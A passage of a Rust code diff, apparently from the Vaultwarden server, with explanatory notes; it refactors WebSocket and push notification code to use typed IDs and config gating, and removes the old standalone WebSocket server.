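        Policy { min_length: Some(12), require_special: false },
        Policy { min_length: None, require_special: true },
    ]);
    assert_eq!(merged, Some(Policy { min_length: Some(12), require_special: true }));
}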
@@ -1,28 +1,16 @@
-use std::{
-    net::{IpAddr, SocketAddr},
-    sync::Arc,
-    time::Duration,
-};
+use std::{net::IpAddr, sync::Arc, time::Duration};
 
 use chrono::{NaiveDateTime, Utc};
 use rmpv::Value;
-use rocket::{
-    futures::{SinkExt, StreamExt},
-    Route,
-};
-use tokio::{
-    net::{TcpListener, TcpStream},
-    sync::mpsc::Sender,
-};
-use tokio_tungstenite::{
-    accept_hdr_async,
-    tungstenite::{handshake, Message},
-};
+use rocket::{futures::StreamExt, Route};
+use tokio::sync::mpsc::Sender;
+use rocket_ws::{Message, WebSocket};
 
 use crate::{
     auth::{ClientIp, WsAccessTokenHeader},
     db::{
-        models::{Cipher, Folder, Send as DbSend, User},
+        models::{AuthRequestId, Cipher, CollectionId, Device, DeviceId, Folder, PushId, Send as DbSend, User, UserId},
         DbConn,
     },
     Error, CONFIG,
@@ -30,7 +18,7 @@ use crate::{
 
 use once_cell::sync::Lazy;
 
-static WS_USERS: Lazy<Arc<WebSocketUsers>> = Lazy::new(|| {
+pub static WS_USERS: Lazy<Arc<WebSocketUsers>> = Lazy::new(|| {
     Arc::new(WebSocketUsers {
         map: Arc::new(dashmap::DashMap::new()),
     })
@@ -47,8 +35,15 @@ use super::{
     push_send_update, push_user_update,
 };
 
+static NOTIFICATIONS_DISABLED: Lazy<bool> = Lazy::new(|| !CONFIG.enable_websocket() && !CONFIG.push_enabled());
+
 pub fn routes() -> Vec<Route> {
-    routes![websockets_hub, anonymous_websockets_hub]
+    if CONFIG.enable_websocket() {
+        routes![websockets_hub, anonymous_websockets_hub]
+    } else {
+        info!("WebSocket are disabled, realtime sync functionality will not work!");
+        routes![]
+    }
 }
 
 #[derive(FromForm, Debug)]
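`routes()` now only registers the WebSocket endpoints when they are enabled, and the new `NOTIFICATIONS_DISABLED` flag lets every notification path bail out before building a payload when neither WebSockets nor push can deliver it. The gating pattern in miniature, with stand-in functions where the real code reads `CONFIG`:

use once_cell::sync::Lazy;

fn websocket_enabled() -> bool { true }  // stand-in for CONFIG.enable_websocket()
fn push_enabled() -> bool { false }      // stand-in for CONFIG.push_enabled()

// Evaluated once on first use; a cheap bool test on every send afterwards.
static NOTIFICATIONS_DISABLED: Lazy<bool> =
    Lazy::new(|| !websocket_enabled() && !push_enabled());

fn send_notification(payload: &[u8]) {
    // Skip serialization and fan-out entirely when nobody can receive it.
    if *NOTIFICATIONS_DISABLED {
        return;
    }
    let _ = payload; // ... build and dispatch the update ...
}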
@@ -58,13 +53,13 @@ struct WsAccessToken {
 
 struct WSEntryMapGuard {
     users: Arc<WebSocketUsers>,
-    user_uuid: String,
+    user_uuid: UserId,
     entry_uuid: uuid::Uuid,
     addr: IpAddr,
 }
 
 impl WSEntryMapGuard {
-    fn new(users: Arc<WebSocketUsers>, user_uuid: String, entry_uuid: uuid::Uuid, addr: IpAddr) -> Self {
+    fn new(users: Arc<WebSocketUsers>, user_uuid: UserId, entry_uuid: uuid::Uuid, addr: IpAddr) -> Self {
         Self {
             users,
             user_uuid,
@@ -77,7 +72,7 @@ impl WSEntryMapGuard {
 impl Drop for WSEntryMapGuard {
     fn drop(&mut self) {
         info!("Closing WS connection from {}", self.addr);
-        if let Some(mut entry) = self.users.map.get_mut(&self.user_uuid) {
+        if let Some(mut entry) = self.users.map.get_mut(self.user_uuid.as_ref()) {
             entry.retain(|(uuid, _)| uuid != &self.entry_uuid);
         }
     }
@@ -106,9 +101,10 @@ impl Drop for WSAnonymousEntryMapGuard {
     }
 }
 
+#[allow(tail_expr_drop_order)]
 #[get("/hub?<data..>")]
 fn websockets_hub<'r>(
-    ws: rocket_ws::WebSocket,
+    ws: WebSocket,
     data: WsAccessToken,
     ip: ClientIp,
     header_token: WsAccessTokenHeader,
@@ -134,7 +130,7 @@ fn websockets_hub<'r>(
             // Add a channel to send messages to this client to the map
             let entry_uuid = uuid::Uuid::new_v4();
             let (tx, rx) = tokio::sync::mpsc::channel::<Message>(100);
-            users.map.entry(claims.sub.clone()).or_default().push((entry_uuid, tx));
+            users.map.entry(claims.sub.to_string()).or_default().push((entry_uuid, tx));
 
             // Once the guard goes out of scope, the connection will have been closed and the entry will be deleted from the map
             (rx, WSEntryMapGuard::new(users, claims.sub, entry_uuid, addr))
@@ -161,7 +157,6 @@ fn websockets_hub<'r>(
 
                             if serde_json::from_str(msg).ok() == Some(INITIAL_MESSAGE) {
                                 yield Message::binary(INITIAL_RESPONSE);
-                                continue;
                             }
                         }
 
@@ -191,12 +186,9 @@ fn websockets_hub<'r>(
     })
 }
 
+#[allow(tail_expr_drop_order)]
 #[get("/anonymous-hub?<token..>")]
-fn anonymous_websockets_hub<'r>(
-    ws: rocket_ws::WebSocket,
-    token: String,
-    ip: ClientIp,
-) -> Result<rocket_ws::Stream!['r], Error> {
+fn anonymous_websockets_hub<'r>(ws: WebSocket, token: String, ip: ClientIp) -> Result<rocket_ws::Stream!['r], Error> {
     let addr = ip.ip;
     info!("Accepting Anonymous Rocket WS connection from {addr}");
 
@@ -232,7 +224,6 @@ fn anonymous_websockets_hub<'r>(
 
                             if serde_json::from_str(msg).ok() == Some(INITIAL_MESSAGE) {
                                 yield Message::binary(INITIAL_RESPONSE);
-                                continue;
                             }
                         }
 
@@ -297,9 +288,9 @@ fn serialize(val: Value) -> Vec<u8> {
 }
 
 fn serialize_date(date: NaiveDateTime) -> Value {
-    let seconds: i64 = date.timestamp();
-    let nanos: i64 = date.timestamp_subsec_nanos().into();
-    let timestamp = nanos << 34 | seconds;
+    let seconds: i64 = date.and_utc().timestamp();
+    let nanos: i64 = date.and_utc().timestamp_subsec_nanos().into();
+    let timestamp = (nanos << 34) | seconds;
 
     let bs = timestamp.to_be_bytes();
 
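`serialize_date` emits a MessagePack 64-bit timestamp: 30 bits of nanoseconds packed above 34 bits of seconds, written big-endian. The added parentheses only satisfy a precedence lint, since `<<` already binds tighter than `|`. A round-trip sketch of the packing; it uses `u64` to sidestep the sign issues this bit layout would hit at the i64 boundary:

fn pack(seconds: u64, nanos: u64) -> [u8; 8] {
    // timestamp64 layout: | 30-bit nanoseconds | 34-bit seconds |
    ((nanos << 34) | seconds).to_be_bytes()
}

fn unpack(bs: [u8; 8]) -> (u64, u64) {
    let ts = u64::from_be_bytes(bs);
    (ts & ((1 << 34) - 1), ts >> 34)
}

fn main() {
    let (secs, nanos) = (1_700_000_000, 500_000_000);
    assert_eq!(unpack(pack(secs, nanos)), (secs, nanos));
}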
@@ -337,8 +328,8 @@ pub struct WebSocketUsers {
 }
 
 impl WebSocketUsers {
-    async fn send_update(&self, user_uuid: &str, data: &[u8]) {
-        if let Some(user) = self.map.get(user_uuid).map(|v| v.clone()) {
+    async fn send_update(&self, user_id: &UserId, data: &[u8]) {
+        if let Some(user) = self.map.get(user_id.as_ref()).map(|v| v.clone()) {
             for (_, sender) in user.iter() {
                 if let Err(e) = sender.send(Message::binary(data)).await {
                     error!("Error sending WS update {e}");
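`send_update` fans one prebuilt frame out to every channel registered for a user in the `DashMap`. A compact model of that registry; note the entry is cloned out of the map before awaiting, since holding a DashMap shard guard across an `.await` point can deadlock with writers:

use dashmap::DashMap;
use tokio::sync::mpsc::Sender;

struct Registry {
    map: DashMap<String, Vec<(uuid::Uuid, Sender<Vec<u8>>)>>,
}

impl Registry {
    async fn send_update(&self, user_id: &str, data: &[u8]) {
        // Clone first, then drop the guard, then await the sends.
        if let Some(entries) = self.map.get(user_id).map(|v| v.clone()) {
            for (_, sender) in entries.iter() {
                // A send error means the receiver hung up; the Drop-guard
                // cleanup on the connection side removes the stale entry.
                let _ = sender.send(data.to_vec()).await;
            }
        }
    }
}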
@@ -348,55 +339,67 @@ impl WebSocketUsers {
         }
     }
 
     // NOTE: The last modified date needs to be updated before calling these methods
-    pub async fn send_user_update(&self, ut: UpdateType, user: &User) {
+    pub async fn send_user_update(&self, ut: UpdateType, user: &User, push_uuid: &Option<PushId>, conn: &mut DbConn) {
+        // Skip any processing if both WebSockets and Push are not active
+        if *NOTIFICATIONS_DISABLED {
+            return;
+        }
         let data = create_update(
-            vec![("UserId".into(), user.uuid.clone().into()), ("Date".into(), serialize_date(user.updated_at))],
+            vec![("UserId".into(), user.uuid.to_string().into()), ("Date".into(), serialize_date(user.updated_at))],
             ut,
             None,
         );
 
-        self.send_update(&user.uuid, &data).await;
+        if CONFIG.enable_websocket() {
+            self.send_update(&user.uuid, &data).await;
+        }
 
         if CONFIG.push_enabled() {
-            push_user_update(ut, user);
+            push_user_update(ut, user, push_uuid, conn).await;
         }
     }
 
-    pub async fn send_logout(&self, user: &User, acting_device_uuid: Option<String>) {
+    pub async fn send_logout(&self, user: &User, acting_device_id: Option<DeviceId>, conn: &mut DbConn) {
+        // Skip any processing if both WebSockets and Push are not active
+        if *NOTIFICATIONS_DISABLED {
+            return;
+        }
        let data = create_update(
-            vec![("UserId".into(), user.uuid.clone().into()), ("Date".into(), serialize_date(user.updated_at))],
+            vec![("UserId".into(), user.uuid.to_string().into()), ("Date".into(), serialize_date(user.updated_at))],
             UpdateType::LogOut,
-            acting_device_uuid.clone(),
+            acting_device_id.clone(),
         );
 
-        self.send_update(&user.uuid, &data).await;
+        if CONFIG.enable_websocket() {
+            self.send_update(&user.uuid, &data).await;
+        }
 
         if CONFIG.push_enabled() {
-            push_logout(user, acting_device_uuid);
+            push_logout(user, acting_device_id.clone(), conn).await;
         }
     }
 
-    pub async fn send_folder_update(
-        &self,
-        ut: UpdateType,
-        folder: &Folder,
-        acting_device_uuid: &String,
-        conn: &mut DbConn,
-    ) {
+    pub async fn send_folder_update(&self, ut: UpdateType, folder: &Folder, device: &Device, conn: &mut DbConn) {
+        // Skip any processing if both WebSockets and Push are not active
+        if *NOTIFICATIONS_DISABLED {
+            return;
+        }
         let data = create_update(
             vec![
-                ("Id".into(), folder.uuid.clone().into()),
-                ("UserId".into(), folder.user_uuid.clone().into()),
+                ("Id".into(), folder.uuid.to_string().into()),
+                ("UserId".into(), folder.user_uuid.to_string().into()),
                 ("RevisionDate".into(), serialize_date(folder.updated_at)),
             ],
             ut,
-            Some(acting_device_uuid.into()),
+            Some(device.uuid.clone()),
         );
 
-        self.send_update(&folder.user_uuid, &data).await;
+        if CONFIG.enable_websocket() {
+            self.send_update(&folder.user_uuid, &data).await;
+        }
 
         if CONFIG.push_enabled() {
-            push_folder_update(ut, folder, acting_device_uuid, conn).await;
+            push_folder_update(ut, folder, device, conn).await;
         }
     }
 
@@ -404,42 +407,48 @@ impl WebSocketUsers {
         &self,
         ut: UpdateType,
         cipher: &Cipher,
-        user_uuids: &[String],
-        acting_device_uuid: &String,
-        collection_uuids: Option<Vec<String>>,
+        user_ids: &[UserId],
+        device: &Device,
+        collection_uuids: Option<Vec<CollectionId>>,
         conn: &mut DbConn,
     ) {
-        let org_uuid = convert_option(cipher.organization_uuid.clone());
+        // Skip any processing if both WebSockets and Push are not active
+        if *NOTIFICATIONS_DISABLED {
+            return;
+        }
+        let org_id = convert_option(cipher.organization_uuid.as_deref());
         // Depending if there are collections provided or not, we need to have different values for the following variables.
         // The user_uuid should be `null`, and the revision date should be set to now, else the clients won't sync the collection change.
-        let (user_uuid, collection_uuids, revision_date) = if let Some(collection_uuids) = collection_uuids {
+        let (user_id, collection_uuids, revision_date) = if let Some(collection_uuids) = collection_uuids {
             (
                 Value::Nil,
-                Value::Array(collection_uuids.into_iter().map(|v| v.into()).collect::<Vec<rmpv::Value>>()),
+                Value::Array(collection_uuids.into_iter().map(|v| v.to_string().into()).collect::<Vec<Value>>()),
                 serialize_date(Utc::now().naive_utc()),
             )
         } else {
-            (convert_option(cipher.user_uuid.clone()), Value::Nil, serialize_date(cipher.updated_at))
+            (convert_option(cipher.user_uuid.as_deref()), Value::Nil, serialize_date(cipher.updated_at))
         };
 
         let data = create_update(
             vec![
-                ("Id".into(), cipher.uuid.clone().into()),
-                ("UserId".into(), user_uuid),
-                ("OrganizationId".into(), org_uuid),
+                ("Id".into(), cipher.uuid.to_string().into()),
+                ("UserId".into(), user_id),
+                ("OrganizationId".into(), org_id),
                 ("CollectionIds".into(), collection_uuids),
                 ("RevisionDate".into(), revision_date),
             ],
             ut,
-            Some(acting_device_uuid.into()),
+            Some(device.uuid.clone()), // Acting device id (unique device/app uuid)
         );
 
-        for uuid in user_uuids {
-            self.send_update(uuid, &data).await;
+        if CONFIG.enable_websocket() {
+            for uuid in user_ids {
+                self.send_update(uuid, &data).await;
+            }
         }
 
-        if CONFIG.push_enabled() && user_uuids.len() == 1 {
-            push_cipher_update(ut, cipher, acting_device_uuid, conn).await;
+        if CONFIG.push_enabled() && user_ids.len() == 1 {
+            push_cipher_update(ut, cipher, device, conn).await;
         }
     }
 
@@ -447,66 +456,83 @@ impl WebSocketUsers {
         &self,
         ut: UpdateType,
         send: &DbSend,
-        user_uuids: &[String],
-        acting_device_uuid: &String,
+        user_ids: &[UserId],
+        device: &Device,
         conn: &mut DbConn,
     ) {
-        let user_uuid = convert_option(send.user_uuid.clone());
+        // Skip any processing if both WebSockets and Push are not active
+        if *NOTIFICATIONS_DISABLED {
+            return;
+        }
+        let user_id = convert_option(send.user_uuid.as_deref());
 
         let data = create_update(
             vec![
-                ("Id".into(), send.uuid.clone().into()),
-                ("UserId".into(), user_uuid),
+                ("Id".into(), send.uuid.to_string().into()),
+                ("UserId".into(), user_id),
                 ("RevisionDate".into(), serialize_date(send.revision_date)),
             ],
             ut,
             None,
         );
 
-        for uuid in user_uuids {
-            self.send_update(uuid, &data).await;
+        if CONFIG.enable_websocket() {
+            for uuid in user_ids {
+                self.send_update(uuid, &data).await;
+            }
         }
-        if CONFIG.push_enabled() && user_uuids.len() == 1 {
-            push_send_update(ut, send, acting_device_uuid, conn).await;
+        if CONFIG.push_enabled() && user_ids.len() == 1 {
+            push_send_update(ut, send, device, conn).await;
         }
     }
 
     pub async fn send_auth_request(
         &self,
-        user_uuid: &String,
-        auth_request_uuid: &String,
-        acting_device_uuid: &String,
+        user_id: &UserId,
+        auth_request_uuid: &str,
+        device: &Device,
         conn: &mut DbConn,
     ) {
+        // Skip any processing if both WebSockets and Push are not active
+        if *NOTIFICATIONS_DISABLED {
+            return;
+        }
         let data = create_update(
-            vec![("Id".into(), auth_request_uuid.clone().into()), ("UserId".into(), user_uuid.clone().into())],
+            vec![("Id".into(), auth_request_uuid.to_owned().into()), ("UserId".into(), user_id.to_string().into())],
             UpdateType::AuthRequest,
-            Some(acting_device_uuid.to_string()),
+            Some(device.uuid.clone()),
        );
-        self.send_update(user_uuid, &data).await;
+        if CONFIG.enable_websocket() {
+            self.send_update(user_id, &data).await;
+        }
 
         if CONFIG.push_enabled() {
-            push_auth_request(user_uuid.to_string(), auth_request_uuid.to_string(), conn).await;
+            push_auth_request(user_id, auth_request_uuid, device, conn).await;
         }
     }
 
     pub async fn send_auth_response(
         &self,
-        user_uuid: &String,
-        auth_response_uuid: &str,
-        approving_device_uuid: String,
+        user_id: &UserId,
+        auth_request_id: &AuthRequestId,
+        device: &Device,
         conn: &mut DbConn,
     ) {
+        // Skip any processing if both WebSockets and Push are not active
+        if *NOTIFICATIONS_DISABLED {
+            return;
+        }
         let data = create_update(
-            vec![("Id".into(), auth_response_uuid.to_owned().into()), ("UserId".into(), user_uuid.clone().into())],
+            vec![("Id".into(), auth_request_id.to_string().into()), ("UserId".into(), user_id.to_string().into())],
             UpdateType::AuthRequestResponse,
-            approving_device_uuid.clone().into(),
+            Some(device.uuid.clone()),
         );
-        self.send_update(auth_response_uuid, &data).await;
+        if CONFIG.enable_websocket() {
+            self.send_update(user_id, &data).await;
+        }
 
         if CONFIG.push_enabled() {
-            push_auth_response(user_uuid.to_string(), auth_response_uuid.to_string(), approving_device_uuid, conn)
-                .await;
+            push_auth_response(user_id, auth_request_id, device, conn).await;
         }
     }
 }
@@ -525,13 +551,16 @@ impl AnonymousWebSocketSubscriptions {
         }
     }
 
-    pub async fn send_auth_response(&self, user_uuid: &String, auth_response_uuid: &str) {
+    pub async fn send_auth_response(&self, user_id: &UserId, auth_request_id: &AuthRequestId) {
+        if !CONFIG.enable_websocket() {
+            return;
+        }
         let data = create_anonymous_update(
-            vec![("Id".into(), auth_response_uuid.to_owned().into()), ("UserId".into(), user_uuid.clone().into())],
+            vec![("Id".into(), auth_request_id.to_string().into()), ("UserId".into(), user_id.to_string().into())],
             UpdateType::AuthRequestResponse,
-            user_uuid.to_string(),
+            user_id.clone(),
         );
-        self.send_update(auth_response_uuid, &data).await;
+        self.send_update(auth_request_id, &data).await;
     }
 }
 
@@ -543,14 +572,14 @@ impl AnonymousWebSocketSubscriptions {
         "ReceiveMessage", // Target
         [ // Arguments
             {
-                "ContextId": acting_device_uuid || Nil,
+                "ContextId": acting_device_id || Nil,
                 "Type": ut as i32,
                 "Payload": {}
             }
         ]
     ]
 */
-fn create_update(payload: Vec<(Value, Value)>, ut: UpdateType, acting_device_uuid: Option<String>) -> Vec<u8> {
+fn create_update(payload: Vec<(Value, Value)>, ut: UpdateType, acting_device_id: Option<DeviceId>) -> Vec<u8> {
     use rmpv::Value as V;
 
     let value = V::Array(vec![
@@ -559,7 +588,7 @@ fn create_update(payload: Vec<(Value, Value)>, ut: UpdateType, acting_device_uuid
         V::Nil,
         "ReceiveMessage".into(),
         V::Array(vec![V::Map(vec![
-            ("ContextId".into(), acting_device_uuid.map(|v| v.into()).unwrap_or_else(|| V::Nil)),
+            ("ContextId".into(), acting_device_id.map(|v| v.to_string().into()).unwrap_or_else(|| V::Nil)),
             ("Type".into(), (ut as i32).into()),
             ("Payload".into(), payload.into()),
         ])]),
@@ -568,7 +597,7 @@ fn create_update(payload: Vec<(Value, Value)>, ut: UpdateType, acting_device_uuid
     serialize(value)
 }
 
-fn create_anonymous_update(payload: Vec<(Value, Value)>, ut: UpdateType, user_id: String) -> Vec<u8> {
+fn create_anonymous_update(payload: Vec<(Value, Value)>, ut: UpdateType, user_id: UserId) -> Vec<u8> {
     use rmpv::Value as V;
 
     let value = V::Array(vec![
@@ -579,7 +608,7 @@ fn create_anonymous_update(payload: Vec<(Value, Value)>, ut: UpdateType, user_id
         V::Array(vec![V::Map(vec![
             ("Type".into(), (ut as i32).into()),
             ("Payload".into(), payload.into()),
-            ("UserId".into(), user_id.into()),
+            ("UserId".into(), user_id.to_string().into()),
         ])]),
     ]);
 
@@ -620,127 +649,3 @@ pub enum UpdateType {
|
|||||||
|
|
||||||
pub type Notify<'a> = &'a rocket::State<Arc<WebSocketUsers>>;
|
pub type Notify<'a> = &'a rocket::State<Arc<WebSocketUsers>>;
|
||||||
pub type AnonymousNotify<'a> = &'a rocket::State<Arc<AnonymousWebSocketSubscriptions>>;
|
pub type AnonymousNotify<'a> = &'a rocket::State<Arc<AnonymousWebSocketSubscriptions>>;
|
||||||
|
|
||||||
pub fn start_notification_server() -> Arc<WebSocketUsers> {
|
|
||||||
let users = Arc::clone(&WS_USERS);
|
|
||||||
if CONFIG.websocket_enabled() {
|
|
||||||
let users2 = Arc::<WebSocketUsers>::clone(&users);
|
|
||||||
tokio::spawn(async move {
|
|
||||||
let addr = (CONFIG.websocket_address(), CONFIG.websocket_port());
|
|
||||||
info!("Starting WebSockets server on {}:{}", addr.0, addr.1);
|
|
||||||
let listener = TcpListener::bind(addr).await.expect("Can't listen on websocket port");
|
|
||||||
|
|
||||||
let (shutdown_tx, mut shutdown_rx) = tokio::sync::oneshot::channel::<()>();
|
|
||||||
CONFIG.set_ws_shutdown_handle(shutdown_tx);
|
|
||||||
|
|
||||||
loop {
|
|
||||||
tokio::select! {
|
|
||||||
Ok((stream, addr)) = listener.accept() => {
|
|
||||||
tokio::spawn(handle_connection(stream, Arc::<WebSocketUsers>::clone(&users2), addr));
|
|
||||||
}
|
|
||||||
|
|
||||||
_ = &mut shutdown_rx => {
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
info!("Shutting down WebSockets server!")
|
|
||||||
});
|
|
||||||
}
|
|
||||||
|
|
||||||
users
|
|
||||||
}
|
|
||||||
|
|
||||||
async fn handle_connection(stream: TcpStream, users: Arc<WebSocketUsers>, addr: SocketAddr) -> Result<(), Error> {
|
|
||||||
let mut user_uuid: Option<String> = None;
|
|
||||||
|
|
||||||
info!("Accepting WS connection from {addr}");
|
|
||||||
|
|
||||||
// Accept connection, do initial handshake, validate auth token and get the user ID
|
|
||||||
use handshake::server::{Request, Response};
|
|
||||||
let mut stream = accept_hdr_async(stream, |req: &Request, res: Response| {
|
|
||||||
if let Some(token) = get_request_token(req) {
|
|
||||||
if let Ok(claims) = crate::auth::decode_login(&token) {
|
|
||||||
user_uuid = Some(claims.sub);
|
|
||||||
return Ok(res);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
Err(Response::builder().status(401).body(None).unwrap())
|
|
||||||
})
|
|
||||||
.await?;
|
|
||||||
|
|
||||||
let user_uuid = user_uuid.expect("User UUID should be set after the handshake");
|
|
||||||
|
|
||||||
let (mut rx, guard) = {
|
|
||||||
// Add a channel to send messages to this client to the map
|
|
||||||
let entry_uuid = uuid::Uuid::new_v4();
|
|
||||||
let (tx, rx) = tokio::sync::mpsc::channel::<Message>(100);
|
|
||||||
users.map.entry(user_uuid.clone()).or_default().push((entry_uuid, tx));
|
|
||||||
|
|
||||||
// Once the guard goes out of scope, the connection will have been closed and the entry will be deleted from the map
|
|
||||||
(rx, WSEntryMapGuard::new(users, user_uuid, entry_uuid, addr.ip()))
|
|
||||||
};
|
|
||||||
|
|
||||||
let _guard = guard;
|
|
||||||
let mut interval = tokio::time::interval(Duration::from_secs(15));
|
|
||||||
loop {
|
|
||||||
tokio::select! {
|
|
||||||
res = stream.next() => {
|
|
||||||
match res {
|
|
||||||
Some(Ok(message)) => {
|
|
||||||
match message {
|
|
||||||
// Respond to any pings
|
|
||||||
Message::Ping(ping) => stream.send(Message::Pong(ping)).await?,
|
|
||||||
Message::Pong(_) => {/* Ignored */},
|
|
||||||
|
|
||||||
// We should receive an initial message with the protocol and version, and we will reply to it
|
|
||||||
Message::Text(ref message) => {
|
|
||||||
let msg = message.strip_suffix(RECORD_SEPARATOR as char).unwrap_or(message);
|
|
||||||
|
|
||||||
if serde_json::from_str(msg).ok() == Some(INITIAL_MESSAGE) {
|
|
||||||
stream.send(Message::binary(INITIAL_RESPONSE)).await?;
|
|
||||||
continue;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
// Just echo anything else the client sends
|
|
||||||
_ => stream.send(message).await?,
|
|
||||||
}
|
|
||||||
}
|
|
||||||
_ => break,
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
res = rx.recv() => {
|
|
||||||
match res {
|
|
||||||
Some(res) => stream.send(res).await?,
|
|
||||||
None => break,
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
_ = interval.tick() => stream.send(Message::Ping(create_ping())).await?
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
Ok(())
|
|
||||||
}
|
|
||||||
|
|
||||||
fn get_request_token(req: &handshake::server::Request) -> Option<String> {
|
|
||||||
const ACCESS_TOKEN_KEY: &str = "access_token=";
|
|
||||||
|
|
||||||
if let Some(Ok(auth)) = req.headers().get("Authorization").map(|a| a.to_str()) {
|
|
||||||
if let Some(token_part) = auth.strip_prefix("Bearer ") {
|
|
||||||
return Some(token_part.to_owned());
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
if let Some(params) = req.uri().query() {
|
|
||||||
let params_iter = params.split('&').take(1);
|
|
||||||
for val in params_iter {
|
|
||||||
if let Some(stripped) = val.strip_prefix(ACCESS_TOKEN_KEY) {
|
|
||||||
return Some(stripped.to_owned());
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
None
|
|
||||||
}
|
|
||||||
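The hunk above removes the standalone WebSocket server entirely: `start_notification_server`, its per-connection handler, and the token-extraction helper are all gone, consistent with notifications being served through the main Rocket listener rather than a dedicated port. The accept-loop-with-shutdown shape the removed code used is a stock tokio idiom worth recognizing; a minimal self-contained sketch of just that idiom (the `handle_conn` task here is a hypothetical stand-in, not Vaultwarden's handler):

    use tokio::net::{TcpListener, TcpStream};
    use tokio::sync::oneshot;

    // Stand-in for the real per-connection work.
    async fn handle_conn(_stream: TcpStream, addr: std::net::SocketAddr) {
        println!("connection from {addr}");
    }

    // Accept new connections until the oneshot shutdown signal fires.
    async fn serve(listener: TcpListener, mut shutdown_rx: oneshot::Receiver<()>) {
        loop {
            tokio::select! {
                Ok((stream, addr)) = listener.accept() => {
                    tokio::spawn(handle_conn(stream, addr));
                }
                _ = &mut shutdown_rx => break, // stop accepting once shutdown is signalled
            }
        }
    }

The `&mut shutdown_rx` borrow inside `select!` keeps the receiver alive across loop iterations, which is why the removed code was written the same way.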
src/api/push.rs (293 lines changed)

@@ -1,11 +1,15 @@
-use reqwest::header::{ACCEPT, AUTHORIZATION, CONTENT_TYPE};
+use reqwest::{
+    header::{ACCEPT, AUTHORIZATION, CONTENT_TYPE},
+    Method,
+};
 use serde_json::Value;
 use tokio::sync::RwLock;
 
 use crate::{
     api::{ApiResult, EmptyResult, UpdateType},
-    db::models::{Cipher, Device, Folder, Send, User},
-    util::get_reqwest_client,
+    db::models::{AuthRequestId, Cipher, Device, DeviceId, Folder, PushId, Send, User, UserId},
+    http_client::make_http_request,
+    util::{format_date, get_uuid},
     CONFIG,
 };
 
@@ -24,20 +28,20 @@ struct LocalAuthPushToken {
     valid_until: Instant,
 }
 
-async fn get_auth_push_token() -> ApiResult<String> {
-    static PUSH_TOKEN: Lazy<RwLock<LocalAuthPushToken>> = Lazy::new(|| {
+async fn get_auth_api_token() -> ApiResult<String> {
+    static API_TOKEN: Lazy<RwLock<LocalAuthPushToken>> = Lazy::new(|| {
         RwLock::new(LocalAuthPushToken {
             access_token: String::new(),
             valid_until: Instant::now(),
         })
     });
-    let push_token = PUSH_TOKEN.read().await;
+    let api_token = API_TOKEN.read().await;
 
-    if push_token.valid_until.saturating_duration_since(Instant::now()).as_secs() > 0 {
+    if api_token.valid_until.saturating_duration_since(Instant::now()).as_secs() > 0 {
         debug!("Auth Push token still valid, no need for a new one");
-        return Ok(push_token.access_token.clone());
+        return Ok(api_token.access_token.clone());
     }
-    drop(push_token); // Drop the read lock now
+    drop(api_token); // Drop the read lock now
 
     let installation_id = CONFIG.push_installation_id();
     let client_id = format!("installation.{installation_id}");
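The renamed `get_auth_api_token` keeps the same caching discipline as before: take the cheap read lock, return early while the cached token is still valid, and only fall through to the write lock (and the refresh request) after expiry. The same read-then-write pattern in isolation, with a stand-in for the real refresh call:

    use std::time::{Duration, Instant};
    use once_cell::sync::Lazy;
    use tokio::sync::RwLock;

    struct CachedToken {
        access_token: String,
        valid_until: Instant,
    }

    static TOKEN: Lazy<RwLock<CachedToken>> = Lazy::new(|| {
        RwLock::new(CachedToken { access_token: String::new(), valid_until: Instant::now() })
    });

    // Fast path takes only the read lock; an expired token pays for the write lock.
    async fn cached_or_refresh() -> String {
        let t = TOKEN.read().await;
        if t.valid_until > Instant::now() {
            return t.access_token.clone();
        }
        drop(t); // release the read lock before taking the write lock
        let mut t = TOKEN.write().await;
        t.access_token = "fresh-token".to_string(); // stand-in for the real HTTP call
        t.valid_until = Instant::now() + Duration::from_secs(1800);
        t.access_token.clone()
    }

Dropping the read guard before requesting the write guard matters: awaiting `write()` on the same `tokio::sync::RwLock` while still holding a read guard on the same task would deadlock, which is exactly why the diff keeps the explicit `drop(api_token)`.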
@@ -50,8 +54,7 @@ async fn get_auth_push_token() -> ApiResult<String> {
         ("client_secret", &client_secret),
     ];
 
-    let res = match get_reqwest_client()
-        .post(&format!("{}/connect/token", CONFIG.push_identity_uri()))
+    let res = match make_http_request(Method::POST, &format!("{}/connect/token", CONFIG.push_identity_uri()))?
         .form(&params)
         .send()
         .await
@@ -65,47 +68,50 @@ async fn get_auth_push_token() -> ApiResult<String> {
         Err(e) => err!(format!("Unexpected push token received from bitwarden server: {e}")),
     };
 
-    let mut push_token = PUSH_TOKEN.write().await;
-    push_token.valid_until = Instant::now()
+    let mut api_token = API_TOKEN.write().await;
+    api_token.valid_until = Instant::now()
         .checked_add(Duration::new((json_pushtoken.expires_in / 2) as u64, 0)) // Token valid for half the specified time
         .unwrap();
 
-    push_token.access_token = json_pushtoken.access_token;
+    api_token.access_token = json_pushtoken.access_token;
 
-    debug!("Token still valid for {}", push_token.valid_until.saturating_duration_since(Instant::now()).as_secs());
-    Ok(push_token.access_token.clone())
+    debug!("Token still valid for {}", api_token.valid_until.saturating_duration_since(Instant::now()).as_secs());
+    Ok(api_token.access_token.clone())
 }
 
 pub async fn register_push_device(device: &mut Device, conn: &mut crate::db::DbConn) -> EmptyResult {
-    if !CONFIG.push_enabled() || !device.is_push_device() || device.is_registered() {
+    if !CONFIG.push_enabled() || !device.is_push_device() {
         return Ok(());
     }
 
     if device.push_token.is_none() {
-        warn!("Skipping the registration of the device {} because the push_token field is empty.", device.uuid);
-        warn!("To get rid of this message you need to clear the app data and reconnect the device.");
+        warn!("Skipping the registration of the device {:?} because the push_token field is empty.", device.uuid);
+        warn!("To get rid of this message you need to logout, clear the app data and login again on the device.");
        return Ok(());
     }
 
-    debug!("Registering Device {}", device.uuid);
+    debug!("Registering Device {:?}", device.push_uuid);
 
-    // generate a random push_uuid so we know the device is registered
-    device.push_uuid = Some(uuid::Uuid::new_v4().to_string());
+    // Generate a random push_uuid so if it doesn't already have one
+    if device.push_uuid.is_none() {
+        device.push_uuid = Some(PushId(get_uuid()));
+    }
 
